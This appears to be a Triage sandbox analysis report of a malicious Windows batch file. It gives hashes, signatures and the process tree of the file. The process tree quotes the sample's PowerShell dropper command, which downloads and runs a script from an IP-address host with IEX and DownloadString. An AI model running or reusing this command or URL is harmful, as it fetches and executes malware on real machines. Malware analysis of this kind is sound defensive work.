78996c71b494d4588386237c37101c663c8420c13e7615a1955195ef483a0e05 | Triage

Analysis

max time kernel
127s
max time network
149s
platform
windows10_x64
resource
win10v200430
submitted
05-06-2020 10:10

Sharing

Report Analysis Logs

General

Target

08d62202634f8b1ef5c5b10ef8db5891.bat
Size

219B
MD5

616c257a819adb60eed0688846b302cd
SHA1

bb40b235e005c837e96ba5ea9ceb2748952808ed
SHA256

78996c71b494d4588386237c37101c663c8420c13e7615a1955195ef483a0e05
SHA512

bb70e6beb231053af8ebd208547aeac3efea4570339377530dd88d9dfae488c85adf06d515e90d2d99d76f16f8a5daac52992ebabcd08e1523d7569d224755d3

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/08d62202634f8b1ef5c5b10ef8db5891

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2160 1880 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 2160 WerFault.exe
Token: SeBackupPrivilege 2160 WerFault.exe
Token: SeDebugPrivilege 2160 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe
2160	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\08d62202634f8b1ef5c5b10ef8db5891.bat"
1⤵
PID:1628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/08d62202634f8b1ef5c5b10ef8db5891');Invoke-FGMKPKSTXRLT;Start-Sleep -s 10000"
2⤵
PID:1880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2160

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2160-0-0x0000000004560000-0x0000000004561000-memory.dmp

Filesize
4KB

Download
memory/2160-1-0x0000000004B90000-0x0000000004B91000-memory.dmp

Filesize
4KB

Download
memory/2160-2-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download